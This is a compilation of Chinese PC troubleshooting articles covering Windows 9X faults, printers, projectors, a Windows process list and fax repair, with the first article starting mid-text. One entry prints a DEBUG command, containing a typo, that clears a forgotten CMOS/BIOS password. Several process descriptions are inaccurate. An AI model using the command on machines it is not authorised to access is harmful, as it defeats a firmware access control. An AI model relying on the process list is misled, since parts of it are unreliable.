    右击Windows 98任务栏，选择弹出菜单的“工具栏”子菜单中的“快速启动”命令（如图7），快速启动工具栏就会重新出现在Windows 98的任务栏上。对于将快速启动工具栏拖到桌面上的情况，我们只须将它重新拖拽到任务栏中即可。

故障十五、无法在Word、WPS中使用某种字体 故障现象:
    在Office 97组件的各个应用程序（如Word、Excel）以及WPS 97、WPS 2000等应用程序的字体列表框中找不到任何已安装的字体，无法在这些应用程序中为文字设置字体,但写字板、记事本、Outlook Express等应用程序却没有问题。

故障分析:
    这主要是用户安装了AutoCAD,导致打印驱动程序出错，造成所有直接调用打印驱动程序的应用程序（如Word、Excel、WPS）出现故障。而记事本等应用程序因为不直接调用打印驱动程序,故一切正常。

解决方法:
    重装安装打印驱动程序即可。

故障十六、系统启动时总要求输入用户密码 故障现象:
    在没有设置多用户的情况下,系统每次启动都要求用户输入用户名及密码。

故障分析:
    用户在安装完Windows 9X后第一次启动时,系统会弹出一个密码确认框,只要用户在这里输入了用户名及密码,即使没有设置多用户,Windows 9X每次启动时也会要求用户输入用户密码。

解决方法:
    安装完Windows 9X之后第一次启动时，系统若要求用户输入密码，一般无须输入任何内容,直接单击“确定”按钮,此后密码框就不再出现。如果用户已经设过用户名和用户密码,我们只有双击“控制面板”中的“密码”选项，打开系统的“密码”设置框,在“用户配置文件”选项卡中选择“此计算机上的所有用户使用相同的首选项及桌面设置”选项(如图8),然后双击“控制面板”中的“网络”图标，打开“网络”设置框,在“主网络登录”列表框中选择“Windows登录”选项(如图9),重新启动计算机后，系统的密码确认框一般就会从你眼前消失。

    若采用上面的步骤后仍不能解决问题，我们可启动注册表编辑器，展开HKEY_LOCAL_ MACHINE＼Network＼Logon主键，将该主键中的UserProfiles值改为0。重新启动计算机,Windows 9X就会像第一次启动时那样询问用户的初识密码,我们只须将密码留空并单击“确认”按钮即可。

故障十七、系统启动时出现“VXD或386无效”的错误提示 故障现象:
    系统在启动时显示*.VXD或386文件无效的错误提示,单击任意键后,系统能启动并运行正常。

故障分析:
    该故障的产生主要是因为:
一、用户在系统中安装了不兼容的驱动程序或网络组件,如果是这样,我们只须禁止这些项目的运行或将其卸载即可;
二、采用正确的程序卸载方法将某些自启动程序（如NORTON杀毒程序）卸载后，因为某种原因造成注册表损坏，于是用备份的注册表文件（该备份文件建立时，自启动程序还没有卸载）进行恢复，这样也会造成系统启动时找不到某些.VXD或.386文件（因为这些文件被卸载了,而备份的注册表文件中仍保留着这些文件的启动信息）。

解决方法:
    若错误信息所涉及的文件扩展名为.386或未显示文件的扩展名，我们可先打开Windows文件夹中的System.ini文件，然后在该文件的[386Enh]节中删除错误提示所涉及的命令行。如果提示信息仍然存在，就须启动注册表编辑器，利用该编辑器提供的搜索功能（执行“编辑”菜单的“查找”命令）找到该命令所在的主键，将该主键删除即可。若错误信息所涉及的文件扩展名为.vxd，我们也必须进入注册表编辑器，将对应的VXD驱动程序的主键删除。这些自启动程序和驱动程序一般位于HKEY_LOCAL_MA CHINE＼System＼CurrentControlSet＼Services＼VxD主键和HKEY_LOCAL_MACHINE＼Software＼Microsoft＼Windows＼CurrentVersion＼Run（RunOnce）主键中。

故障十八、关闭Windows 9X时计算机停止了响应 故障现象:
    执行Windows 9X的“关闭系统/关闭计算机”命令之后，系统无法正常关机（长时间处在显示“正在关机”的画面状态中）。

故障分析:
    引发此故障的原因较多，如关闭系统功能所对应的声音文件损坏、快速关机功能存在冲突、电源管理功能存在冲突等，我们得具体情况具体分析之后才能找出解决办法。

解决方法:
    首先我们可利用“控制面板”中的“声音”选项取消“关闭系统”所对应的声音文件，然后重新启动计算机，查看问题是否解决。若没有则启动Windows 9X的系统配置程序（单击“开始/程序/附件/系统工具/系统信息/工具/系统配置程序），单击“常规”标签中的“高级”按钮，打开“高级疑难解答设置”对话框，最后复选“禁用快速关机”选项取消系统的快速关机功能。重新启动计算机，看问题是否得以解决。若仍没有解决，则按下Win+Break组合键，打开“系统属性”设置框，在“设备管理器”选项卡中展开“系统设备”分支，双击“高级电源管理支持”项，打开“高级电源管理支持属性”设置框，复选“常规”标签中的“在此硬件配置文件中禁用”选项（如图10），关闭高级电源管理功能。重新启动计算机，问题一般都会迎刃而解（若仍然不能解决问题，我们就只有根据Bootlog.txt文件的记录对系统进行检查了）。

故障十九、打印字体丢失或打印字体与预览字体不一样 故障现象:
    用户在应用程序（如Word、WPS）中打印预览文档时字体显示正常，可执行打印操作后，打印出来的字体却与屏幕上显示的不一样（或打印字体干脆丢失）。

故障分析:
    该故障是由于相应的TrueType字体被破坏所致。

解决方法:
    在Windows 9X的”控制面板”中双击“字体”选项，打开“Fonts”文件夹，将不能正常打印的字体删除，然后执行“Fonts”文件夹“文件”菜单的“安装新字体”命令，打开“添加字体”对话框重新安装删除的字体即可(对于Windows自带的字体，我们可以先用“系统信息”中的“系统文件检查器”将该字体从Windows 9X的安装光盘中提取出来，再用“Fonts”文件夹“文件”菜单的“安装新字体”进行安装)。

故障二十、系统提示内存不足 故障现象:
    打开某些应用软件，如Word 97/2000时，Windows 9X提示内存不足（计算机的内存是64MB），以至于Word 97/2000不能运行。

故障分析:
    该故障的出现并非是用户的物理内存不够,而是系统交换文件所在分区的自由空间不够!我们知道,Windows 9X在使用过程中,当物理内存不够时,系统会从硬盘中移出一部分自由空间来作为虚拟内存。假如用来转化虚拟内存的磁盘剩余空间不足，Windows 9X就可能无法找到足够的磁盘空间来保存内存中的数据,这时就会提示内存不足!对此,我们可通过手工调整交换文件的状态来解决。

解决方法:
    用鼠标右键单击桌面上“我的电脑”，然后执行弹出菜单中的“属性”命令，打开“系统属性”设置框，选择“性能”选项卡，接着单击“虚拟内存”按钮，打开“虚拟内存”对话框(如图11),选择“用户自己指定虚拟内存设置”选项，最后在“硬盘”对话框中选择拥有较大剩余磁盘空间的磁盘分区即可(若用户同时安装了两个以上的硬盘,最好将速度较快的硬盘分区作为虚拟内存盘)。

Windows系统故障 故障二十一、Windows 9X显示内存比实际内存少 故障现象:
    按下Win+Break组合键,调出“系统属性”对话框,发现该框中显示的内存比实际安装的内存要少。 故障分析:该故障主要是由BIOS设置、虚拟驱动程序（如虚拟磁盘）或保护模式的驱动程序不兼容造成的，另外，用户若在Config.sys文件中为HIMEM.SYS添加了/INT15=XXX参数（为中断15H接口保留扩展内存）也可能会导致此类问题。

解决方法:
    由BIOS设置不当引起:进入BIOS设置界面,找到“CHIPSET FEATURES SETUP/Memory Hole At 15Mb Addr”,将原来的设置值“15M-16M”改为“Disabled”即可。 由加载虚拟磁盘引起:进入Config.sys文件,将RAMDRIVE.SYS所在的命令行删除即可。 由/INT15=XXX引起:进入Config.sys文件,将DEVICE=HIMEM.SYS的/INT15=XXX参数删除即可。 如果上面的方法都不行,可启动Windows 9X的“系统配置实用程序”,复选“常规”选项卡中的“选择性启动”选项并取消其中的“处理System.ini文件”选项(如图12),重新启动计算机。若内存数显示正确，说明内存丢失是由System.ini文件加载的虚拟设备驱动程序造成的，此时我们应再次打开Windows 9X的“系统配置实用程序”，复选“常规”选项卡中的“处理Syst em.ini文件”选项，然后单击“System. ini”选项卡，展开“[386Enh]”分支。我们可以从中发现，该分支一部分命令的前面带有Windows标志,一部分则没有，这些不带Windows标志的驱动程序中就有导致内存丢失的程序,我们应逐一禁止这些驱动程序的运行（取消相应驱动程序左边的复选框即可，每禁止一次后就重新启动一次计算机）来检查到底是哪个驱动程序引起的故障。如果内存数量依然不对,我们可以再采用下面的办法: 按下Win+Break组合键,调出“系统属性”对话框，选择“设备管理器”选项卡。接着从系统设备列表中选择某个正在使用保护模式的设备，单击“属性”按钮,打开该设备属性设置框，复选“常规”选项卡中的“在此硬件配置文件中禁用”选项（如图13），当系统询问是否重新启动计算机时选择“否”。之后重复上述操作，将设备列表中列出的除系统设备以外的每一设备全部禁止使用。重新启动计算机，若内存数量恢复正常,表明内存丢失是由保护模式的驱动程序造成的,我们应按照前面检查虚拟驱动程序的方法逐一检查这些保护模式的驱动程序以排除故障。

故障二十二、硬盘盘符发生错乱 故障现象:
    为计算机添加第二块硬盘后,第二块硬盘的盘符居然变成了D,而原来的D盘则变成了E，这使得许多应用程序因为盘符错乱而无法运行。

故障分析:
    按照DOS对硬盘的管理方式,当计算机只有一个硬盘时,该硬盘的主分区就是C盘,其他各个逻辑分区依次为D、E……不过当计算机中同时有两个(或更多)的硬盘时,各个磁盘分区的盘符就会发生变化——第一个硬盘的主分区还是C,而D则是第二块硬盘的主分区盘符,第一块硬盘的各个逻辑分区将依次变为E、F……第二块硬盘的各个逻辑分区则为G、H……针对只有第二块硬盘主分区的盘符才会“插队”这一规律和Windows 9X的即插即用功能，我们可以采用两种方法进行解决。

解决方法:
    用户若以Windows 9X为操作平台，并且只在Windows 9X中使用第二块硬盘，则问题非常容易解决。我们只须在BIOS中将第二块硬盘设置为NONE（空）即可。这样，尽管系统的BIOS不能发现第二块硬盘，但Windows 9X的即插即用功能却会探测到新增的硬盘，并自动为该硬盘上的各个磁盘分区设置盘符，此时所设置的盘符都排列在第一个硬盘的所有磁盘分区之后。如用户第一块硬盘分为三个区（C、D、E），第二个硬盘分为两个区，当我们采用上述方法处理后，第一个硬盘的磁盘分区将不发生任何变化，仍然是C、D、E，第二块硬盘的两个磁盘分区将顺延为F、G，从而实现了磁盘分区的顺序排列，满足了用户的需要。不过此方法有一个缺点，那就是新增的磁盘分区全部只能在Windows 9X中使用，在DOS下它们将处于隐藏状态，这就会对用户的操作造成一定的影响。 用户若要在DOS下对第二块硬盘进行访问，而又不希望硬盘分区发生错乱该如何办呢？从前面的介绍中我们可以发现，第二块硬盘中，只有主分区才会插入到第一块硬盘的逻辑分区前，它的逻辑分区则不会出现这种情况。利用这一规律，我们在对第二块硬盘进行分区时，不对其设置主分区，而将整个硬盘全部划为扩展分区，然后再设置相应的逻辑分区，此后第二块硬盘的盘符就会按照我们的要求进行排列了。这种方式可保证计算机能在任何条件下(包括在DOS中)访问所有的磁盘分区。

故障二十三、文件关联出错 故障现象:
    一用户反映，当他用画笔程序打开LOGO.SYS文件后，只要他双击.SYS文件，系统就会直接启动画笔程序来打开该.SYS文件。

故障分析:
    这主要是该用户在“打开方式”对话框中选择用于打开Logo.sys文件的应用程序(画笔程序)时没有取消“始终使用该程序打开这种类型的文件”选项，这样系统就在用户不知情的情况下自动为.SYS文件与画笔程序之间建立了关联。我们只要将SYS文件的打开方式删除即可解决问题。

解决方法:
    运行注册表编辑器Regedit.exe，找到HKEY_CLASSES_RO OT＼sysfile子键，将其下的Shell主键删除，则SYS文件的关联方式即被取消（如图14）。 对于其他类型的文件，我们可在任一文件夹窗口中执行“查看”菜单的“文件夹选项”命令，然后在“文件夹选项”对话框中选择“文件类型”选项卡（如图15），从“已注册的应用程序”列表框中选择拟删除的数据文件类型，最后单击“删除”按钮，也可取消文件默认的关联方式。不过，这种方法对SYS这类文件不适用。

故障二十四、忘记了CMOS密码 故障现象:
    为CMOS设置密码后，由于较长时间没用，忘记了该密码，以致无法进入CMOS。

解决方法:对于这种情况，使用DEBUG是最好的解决办法: C:/>DDEBUG -o 70 10 -o 71 10 -q


常见Windows故障全面排除方案

《一键清理系统垃圾》

常见Windows故障全面排除方案

故障一、显示蓝天白云图的时间太长 故障现象:
    启动计算机时，Windows系统会显示蓝天白云图，其显示时间一般在半分钟左右，然后就进入Windows 9X的桌面。但有些用户反映自己的计算机在启动时，用于显示蓝天白云图的时间往往长达2～3分钟，这是怎么造成的？

故障分析:
    显示蓝天白云图时，系统主要是在执行Config.sys、Autoexec.bat以及Win.ini、System.ini和注册表中的启动选项，若上述文件中的自启动选项太多，就会极大地影响系统的启动速度。另外磁盘出现坏道及系统中存在病毒也会影响系统的启动速度。

解决方法:
    首先检查Autoexec.bat文件，看其中有没有比较耗时的DOS程序命令行（如新近推出的金山毒霸就利用Autoexec.bat文件在启动时对整个Windows目录进行检测），若有，我们可根据自己的需要进行取舍，然后再查看Win.ini、System.ini和注册表中的启动选项，根据自己的需要进行取舍。如果这些文件中的启动选项都被取消后，系统显示蓝天白云图的时间仍然很长，就应该怀疑系统被病毒感染了，这时启动某个（或多个）最新版本的反病毒程序对系统进行扫描是非常必要的。若病毒原因也被排除，我们就应该考虑是磁盘故障了。首先对磁盘进行全面扫描，检查硬盘是否存在坏道，然后运行磁盘碎片整理程序，消除磁盘碎片，最后运行磁盘清理程序，清除计算机中的垃圾文件以腾出必要的磁盘空间。经过上述操作后，系统的启动速度将会大幅度的提升。

故障二、鼠标双击操作无效 故障现象:
    在 Windows窗口中，鼠标的单击和拖拽操作有效，但无法通过双击鼠标来启动应用程序。

故障分析:
    该故障是用户无意中将鼠标双击的时间间隔设置得太短，致使系统将用户的双击操作视为两次不连续的单击操作。我们只须适当调整鼠标双击的速度即可解决该问题。

解决方法:
    进入Windows 9X的“控制面板”，选中“鼠标”选项, 单击鼠标右键，然后选择弹出菜单中的“打开”命令,启动鼠标设置功能。在“鼠标属性”对话框中选择“按钮”选项卡,然后将“双击速度”中的滑杆向左移动（如图1），适当调节Windows 9X的鼠标双击速度（此速度可通过旁边的“测试区域”进行测试），使之与自己的操作速度相适应。

故障三、在DOS环境中找不到物理光驱 故障现象:
    在Windows 9X下，光驱使用正常。在DOS环境中，却找不到物理光驱。

故障分析:
    这主要是用户对DOS环境下非标准硬件设备的使用不了解造成的。在DOS环境下，要使用任何非标准硬件设备都必须为它们添加相应的驱动程序，否则，将找不到相应的硬件设备。

解决方法:
    在DOS下安装相应的光驱驱动程序即可。不过根据不同情况，我们采用的方法也不同:
1.如用户拥有光驱驱动程序盘，且驱动程序盘中有类似Install.bat、Setup.exe的安装程序，我们只须在DOS状态下运行这些安装程序即可解决问题。
2.如用户拥有光驱驱动程序盘，但盘中只有一个SYS驱动程序（如ATAPI_CD.SYS），我们就只能进行手工安装:首先将该文件拷贝到C盘的CDROM目录（如没有该目录则新建一个）中,然后在Config.sys文件中加入“DEVICE=C:\CDROM\ATAPI_CD.SYS/D:MSCD000”命令行,在Autoexec.bat文件中加入“C:\WINDOWS\ COMMAND\MSCDEX.EXE/D:MSCD000 /V”命令行，或在Windows目录下的Dosstart.bat文件中加入“C:\Win dows\Command\MSCDEX.EXE/D:MSCD000/V”命令。其中，Config.sys和DOSSTART.BAT文件用于解决从Windows 9X退到DOS环境下的光驱问题,Config.sys和Autoe xec.bat文件用于解决开机后直接进入DOS环境中的光驱问题。
3.如果用户没有光驱驱动程序盘，可使用Windows 98中自带的OAKCDROM.SYS光驱驱动程序，该光驱驱动程序能兼容现在90%以上的光驱(注:OAKCD ROM.SYS程序在Windows 98的启动软盘上可以找到，我们假设已将它拷到了C盘CDROM目录中)。因此，我们只须将第二步Config.sys文件中的“DEVICE=C:＼CDROM＼ATAPI_CD.SYS /D:MSCD000”命令行改为“DEVICE=C:＼CDROM＼OAKCDROM.SYS /D:MSCD000”命令即可。 执行上述步骤后，我们就可以在DOS环境中使用光驱了。

故障四、整理磁盘碎片导致死循环 故障现象 :
    使用Windows 9X的磁盘碎片整理程序整理磁盘碎片，在进行到10%时程序陷入死循环。

故障分析:
    磁盘碎片整理的1%～10%阶段是检查驱动程序是否有错和读取驱动程序信息，10%之后才进行真正的磁盘碎片整理。系统总是进行到10%之后陷入死循环，多半是因为内存驻留程序，如杀毒软件、屏幕保护程序干扰了正常的磁盘扫描，使程序不能正常进行，从而形成死循环。

解决方法:
    在整理磁盘碎片之前先关闭内存驻留程序，然后再进行整理。如果取消这些内存驻留程序之后磁盘碎片整理仍然不能进行，则应使用SCANDISK对磁盘进行全面检查（包括表面测试），以排除磁盘故障的可能性。另外，用户若较长时间没有整理过磁盘碎片，那么从10%开始到11%的过程的确需要很长的时间（单击“显示资料”按钮，打开系统操作进程可以知道操作是否陷入了死循环）。

故障五、“控制面板”中的设置项目不全 故障现象:
    进入“控制面板”，发现其中少了某些设置项目。

故障分析:
    造成该故障的原因主要有两种，一是用户在CONTROL.INI文件中错误地设置了“*.cpl=no”命令,禁止了这些控制图标的显示;二是相应的系统设置文件(.CPL文件)不存在。

解决方法:
    首先打开Windows 目录中的CONTROL.INI文件，找到[don't load]节，若在该节中发现了相应的“*.cpl=no”命令行则说明故障是由第一种原因造成的，我们只须将这些“*.cpl=no”命令行删除即可解决问题。若在[don't load]节中没有发现“*.cpl=no”命令，说明系统“控制面板”中的设置项目不全是因为对应的.CPL文件不存在。最简单的解决办法就是在其它Windows 版本相同的计算机中将这些.CPL文件拷贝到本机的Windows＼SYSTEM目录中。另外，我们也可以利用Windows的“系统文件检查器”对所需的CPL文件进行恢复。经过上述步骤后，那些丢失的设置项目就会重新出现在Windows 的“控制面板”中。

故障六、无法安装GBK输入法 故障现象:
    在试图使用GBK输入法输入大字符集的汉字时,发现中文Windows 98居然没有提供GBK输入法，即使使用系统的“输入法添加”功能也不能进行添加。

故障分析:
    这并非中文Windows 98没有向用户提供GBK输入法（微软公司就是GBK字符集的倡导者），而是Windows 98将原来在Windows 95中分别用于输入普通文字的普通输入法和专用的GBK输入法合二为一了（如它将原来的“全拼输入法”和“GBK全拼输入法”合并成新的“全拼输入法”）。我们可利用这些合并后的输入法直接输入GBK大字符集中的任何字符。不过由于大字符集中的字符太多，因此GBK输入法的重码也特别多，为加快用户的输入速度，Windows 98特意为这些输入法提供了一个GB2312和GBK的切换开关，平常我们可关闭GBK开关以减少重码，需要时再打开GBK开关输入GBK大字符集汉字。

解决方法:
    调出能输入GBK汉字的输入法（如“全拼输入法”），用鼠标右键单击“输入法状态条”，选择弹出菜单中的“设置”选项，调出“输入法设置”对话框，从“检索字符集”框中选择“GBK”选项（如图2）即可。

故障七、系统总是首先打开汉字输入法 故障现象:
    启动中文Windows 9X后，系统托盘中的输入法图标不是常见的图标，而是某种汉字输入法图标。

故障分析:
    这是用户将某种中文输入法错误地设置为了默认输入法所致，我们只须将系统默认输入法还原为英文输入法即可解决问题。

解决方法:
    右击系统托盘中的“输入法”图标，接着选择弹出菜单中的“属性”命令，选择“键盘属性”设置框中的 “语言”选项卡，然后在“语言”列表框中选择“En英语”输入法并单击“设成默认值”按钮即可（如图3）。

故障八:系统任务栏不见了 故障现象:
    启动计算机后，桌面上的图标显示正常，可是却发现屏幕下边的系统任务栏不见了。

故障分析:
    计算机启动过程中，没出现异常情况，运行程序也正常，故怀疑是任务栏属性被设置成了“自动隐藏”并被拖到了上边、左边和右边的任一边上。

解决方法:
    将鼠标移到上边、左边或右边的任一边上，任务栏就会显现出来。然后单击任务栏中的空白处，选择弹出菜单中的“属性”选项，取消任务栏的“自动隐藏”属性后单击“确定”按钮，接着按住鼠标左键，将任务栏拖拽到屏幕下边即可。

故障九、汉字输入法的状态条“失踪”了 故障现象:
    调出某种汉字输入法后，发现用来切换半角/全角、中西标点符号的输入法状态条不见了。

故障分析:
    事实上，中文Windows 9X的输入法状态条具有显示和隐藏两种状态，不过由于它的切换开关比较隐蔽，有些用户没发现而已。输入法状态条的失踪，就是用户无意中取消了输入法状态条的显示功能所致。

解决方法:
    细心的用户可能会发现，当我们激活了某种汉字输入法后，系统托盘中的输入法状态图标会变成两个。其中一个为相应的输入法程序图标，如，另一个是类似于“纸和笔”的小图标，这就是Windows 9X的输入法属性设置开关。单击该图标后，系统即会弹出一个快捷菜单，其中就有“显示输入法状态”命令（如图4），剩下的嘛……不说你也知道了。

故障十、无法在Windows 98中发送传真 故障现象:
    在Windows 98中找不到传真程序，导致无法发送传真。

故障分析:
    由于国外基本上用电子邮件代替了传真，因此Windows 98在默认情况下也就没有提供传真程序。鉴于中国的特殊情况（联网的计算机少于传真机），微软公司特意为中文Windows 98提供了单独的传真程序，我们只须安装该程序即可解决问题（前提是你的计算机已经能上网了）。

解决方法:
    将中文Windows 98完整版安装光盘插入光驱，然后进入光盘的＼tools＼oldwin95＼message目录，依次安装该目录下的awfax.exe及wms.exe程序，久违的传真功能就会重新出现在你的面前。

故障十一、 帮助文件目录变成乱码 故障现象:
    进入Windows 98后，发现帮助目录中的汉字全变成了乱码（Windows 98自带的帮助、应用程序的帮助都是如此），但点击帮助目录进入帮助文件正文后，显示的内容又完全正常。

故障分析:
    这是用户在IE中安装了繁体中文字库后出现的故障。

解决方法:
    在IE中重新安装简体中文字库即可。


常见打印故障及解决方法

《一键清理系统垃圾》

常见打印故障及解决方法

1.故障现象：发出打印命令后，打印机无反应，系统提示打印机是否联机及电缆连接是否正常。

分析与维修：这可能是打印机电源线末插好、打印电缆未正确连接或接触不良、计算机并口损坏等原因造成的。先按打印机开关，看打印机能不能启动。如不能启动(电源灯不亮)，先检查打印机电源线是否与电源及打印机后的电源插孔正确连接。在关机状态下把电源线重插一遍，并换一个电源插座试一下，看能否解决问题。如果按下电源开关后，打印机能正常启动，就进CMOS设置里看一下并口设置是否设置正确。一般的打印机用的是ECP模式，也有些打印机不支持ECP模式，此时可用“ECP+EPP”，或“NORMAL”。如问题还未解决，则着重检查打印电缆。先把电脑关掉，把打印电缆从主机的并口上拔下，并重新插好，再把打印电缆的另一端从打印机后的并口上拔下再重新插好。注意，一定要把主机关掉，不要带电拔插，否则可能损坏打印机！如果问题还不能解决，就换根打印电缆试试。再不行，那就是主板并口有问题了。

2.故障现象：使用网络打印机时，无法打印或出现找不到网络打印机的提示。

分析与维修：先检查连接打印机的电脑上的打印机设置是否正确，并且确定该打印机已共享。然后检查远程使用网络打印机的电脑上的打印机设置是否正确。注意，设置都正确但是仍然无法打印这种情况经常可能碰到，一般我们在使用网络打印机的电脑上，把正确的打印机驱动程序重装一遍，问题就可以解决。

3.故障现象：打印机不能检测墨水类型或打印出的字符模糊不清。

分析与维修：先对打印头进行清洗(很多打印机的驱动程序里提供了清洗打印头命令，直接使用该命令即可)。如果长时间没使用打印机，就要多清洗几次。如果你对拆卸和安装墨盒比较熟悉，最好把墨盒拆下来，在靠近打印头的地方用柔软的、吸水性较强的纸擦千净。如果还不能解决，那可能就是打印机驱动程序有问题，把与打印机对应的打印机驱动程序重新安装一遍，一般都能解决问题。

4.故障现象：用Word等字处理软件编辑好的文件，在打印预览时排列得整整齐齐，但用打印机打印出来后，纸上有部分文字重叠。

分析与维修：这一般是由于编辑时设置不当造成的，改变一下文件“页面属性”中的纸张大小、纸张类型，每行字数等选项，大部分问题可以解决。


常见投影机故障解决五例

《一键清理系统垃圾》

常见投影机故障解决五例

    1. 投影机无法显示图像

    检查所有连线是否连接好，确保投影机接通电源后才接通电脑的电源。如果投影机仍然无法显示图像，而您使用的是笔记本电脑，那么可能需要您敲击特定按键以激活电脑的外部视频端口：按住笔记本电脑的FN键，然后同时按下标识为LCD/CRT 或显示器图标的对应功能键（F1、 F2、F3等），或者参阅笔记本电脑的说明文档，以进一步了解激活视频端口的信息。

    2. 变形失真

    请将投影机放置于与放映屏幕垂直的位置，便可以消除变形失真，升高或调低投影机前部的升降脚座至图像呈矩形状。必要的情况下，将整套装置放置于较高或较低的位置以矫正图像。

    3. 图像色彩失真

    按投影机键盘上的菜单键，选择显示菜单下的全部重置，如果仍不能解决色彩问题，请检查连线上是否有弯曲或折断的插针，如果插针受损，请立刻更换连线。

    4. 不能显示整个图像

    将电脑的分辨率设置成与投影机分辨率相匹配的大小。

    5. 使用过程中突然关机

    投影机在使用过程中突然处于关机状态，如果排除了人为故障，那么投影机很可能是处于热保护状态。目前很多高档投影机为了有效延长投影机的使用寿命，常具有自我热保护这一功能，一旦投影机内部的热量过大，温度过高的话，它就会自动启动该保护状态，将投影机自动关闭。而在这个状态下，投影机对外界的任何输入控制是不起作用的。当出现这种情况时，大家不要担心投影机发生了故障，只要在投影机自动关机大约30分钟后，再按照正常顺序来打开投影机，就可以恢复正常了。


常用系统进程及功能总览

《一键清理系统垃圾》

常用系统进程及功能总览

进程名称: Windows内存处理系统进程
描述: Windows页面内存管理进程，拥有0级优先。
是否为系统进程: 是
alg.exe
进程文件: alg or alg.exe
进程名称: 应用层网关服务
描述: 这是一个应用层网关服务用于网络共享。
是否为系统进程: 是

csrss.exe
进程文件: csrss or csrss.exe
进程名称: Client/Server Runtime Server Subsystem
描述: 客户端服务子系统，用以控制Windows图形相关子系统。
是否为系统进程: 是

ddhelp.exe
进程文件: ddhelp or ddhelp.exe
进程名称: DirectDraw Helper
描述: DirectDraw Helper是DirectX这个用于图形服务的一个组成部分。
是否为系统进程: 是

dllhost.exe
进程文件: dllhost or dllhost.exe
进程名称: DCOM DLL Host进程
描述: DCOM DLL Host进程支持基于COM对象支持DLL以运行Windows程序。
是否为系统进程: 是

inetinfo.exe
进程文件: inetinfo or inetinfo.exe
进程名称: IIS Admin Service Helper
描述: InetInfo是Microsoft Internet Infomation Services (IIS)的一部分，用于Debug调试除错。
是否为系统进程: 是

internat.exe
进程文件: internat or internat.exe
进程名称: Input Locales
描述: 这个输入控制图标用于更改类似国家设置、键盘类型和日期格式。
是否为系统进程: 是

kernel32.dll
进程文件: kernel32 or kernel32.dll
进程名称: Windows壳进程
描述: Windows壳进程用于管理多线程、内存和资源。
是否为系统进程: 是

lsass.exe
进程文件: lsass or lsass.exe
进程名称: 本地安全权限服务
描述: 这个本地安全权限服务控制Windows安全机制。
是否为系统进程: 是

mdm.exe
进程文件: mdm or mdm.exe
进程名称: Machine Debug Manager
描述: Debug除错管理用于调试应用程序和Microsoft Office中的Microsoft Script Editor脚本编辑器。
是否为系统进程: 是

mmtask.tsk
进程文件: mmtask or mmtask.tsk
进程名称: 多媒体支持进程
描述: 这个Windows多媒体后台程序控制多媒体服务，例如MIDI。
是否为系统进程: 是

mprexe.exe
进程文件: mprexe or mprexe.exe
进程名称: Windows路由进程
描述: Windows路由进程包括向适当的网络部分发出网络请求。
是否为系统进程: 是

msgsrv32.exe
进程文件: msgsrv32 or msgsrv32.exe
进程名称: Windows信使服务
描述: Windows信使服务调用Windows驱动和程序管理在启动。
是否为系统进程: 是

mstask.exe
进程文件: mstask or mstask.exe
进程名称: Windows计划任务
描述: Windows计划任务用于设定继承在什么时间或者什么日期备份或者运行。
是否为系统进程: 是

regsvc.exe
进程文件: regsvc or regsvc.exe
进程名称: 远程注册表服务
描述: 远程注册表服务用于访问在远程计算机的注册表。
是否为系统进程: 是

rpcss.exe
进程文件: rpcss or rpcss.exe
进程名称: RPC Portmapper
描述: Windows 的RPC端口映射进程处理RPC调用(远程模块调用)然后把它们映射给指定的服务提供者。
是否为系统进程: 是

services.exe
进程文件: services or services.exe
进程名称: Windows Service Controller
描述: 管理Windows服务。
是否为系统进程: 是

smss.exe
进程文件: smss or smss.exe
进程名称: Session Manager Subsystem
描述: 该进程为会话管理子系统用以初始化系统变量，MS-DOS驱动名称类似LPT1以及COM，调用Win32壳子系统和运行在Windows登陆过程。
是否为系统进程: 是

snmp.exe
进程文件: snmp or snmp.exe
进程名称: Microsoft SNMP Agent
描述: Windows简单的网络协议代理（SNMP）用于监听和发送请求到适当的网络部分。
是否为系统进程: 是

spool32.exe
进程文件: spool32 or spool32.exe
进程名称: Printer Spooler
描述: Windows打印任务控制程序，用以打印机就绪。
是否为系统进程: 是

spoolsv.exe
进程文件: spoolsv or spoolsv.exe
进程名称: Printer Spooler Service
描述: Windows打印任务控制程序，用以打印机就绪。
是否为系统进程: 是

stisvc.exe
进程文件: stisvc or stisvc.exe
进程名称: Still Image Service
描述: Still Image Service用于控制扫描仪和数码相机连接在Windows。
是否为系统进程: 是

svchost.exe
进程文件: svchost or svchost.exe
进程名称: Service Host Process
描述: Service Host Process是一个标准的动态连接库主机处理服务。
是否为系统进程: 是

system
进程文件: system or system
进程名称: Windows System Process
描述: Microsoft Windows系统进程。
是否为系统进程: 是

taskmon.exe
进程文件: taskmon or taskmon.exe
进程名称: Windows Task Optimizer
描述: windows任务优化器监视你使用某个程序的频率，并且通过加载那些经常使用的程序来整理优化硬盘。
是否为系统进程: 是

tcpsvcs.exe
进程文件: tcpsvcs or tcpsvcs.exe
进程名称: TCP/IP Services
描述: TCP/IP Services Application支持透过TCP/IP连接局域网和Internet。
是否为系统进程: 是

winlogon.exe
进程文件: winlogon or winlogon.exe
进程名称: Windows Logon Process
描述: Windows NT用户登陆程序。
是否为系统进程: 是

winmgmt.exe
进程文件: winmgmt or winmgmt.exe
进程名称: Windows Management Service
描述: Windows Management Service透过Windows Management Instrumentation data (WMI)技术处理来自应用客户端的请求。
是否为系统进程: 是


传真机维修三例

《一键清理系统垃圾》

传真机维修三例

    故障现象一：一台夏普UX－178CN传真机，开机切不断记录纸，液晶显示器显示“Paper Jam”（记录纸卡住）。
    分析处理：向上扳动前面板开启键，打开前面板，切纸刀位于机器的前端部位，取下切纸刀防护罩左边的螺钉，可卸下切纸刀防护罩，发现切纸刀切了一小段记录纸就卡住了，切不断纸。逆时针方向扳动切纸刀使其开口至最大位置，放好记录纸，重新开机，故障依旧。把纸仓里左右两边的斜楔销分别往左右方向扳动，把纸仓稍稍提高，取出左边的电话机底盖，调节齿轮，使切纸刀完成一个完整的切纸动作，即使切纸刀复位，再接通电源，切纸刀切纸正常，故障排除。
    笔者发现造成该机卡纸的原因是：当一卷记录纸快用完时，由于此时的记录纸卷曲严重，造成记录纸输纸不畅，另外一个原因是该机的记录纸是从机器底部输出，出纸口离桌面的距离很近，卷曲的记录纸更不易输出，从而容易造成卡纸，卡纸后切纸刀切不断纸，造成切纸刀不能复位，切一小段后就报警。建议当记录纸快用完时，最好另换一卷，这种故障就可避免了。
    故障现象二：一台松下KX－F828CN传真机，复印时记录纸走了一小段后，液晶显示器显示“Paper Jam”，并且复印的一小段记录纸为全黑。
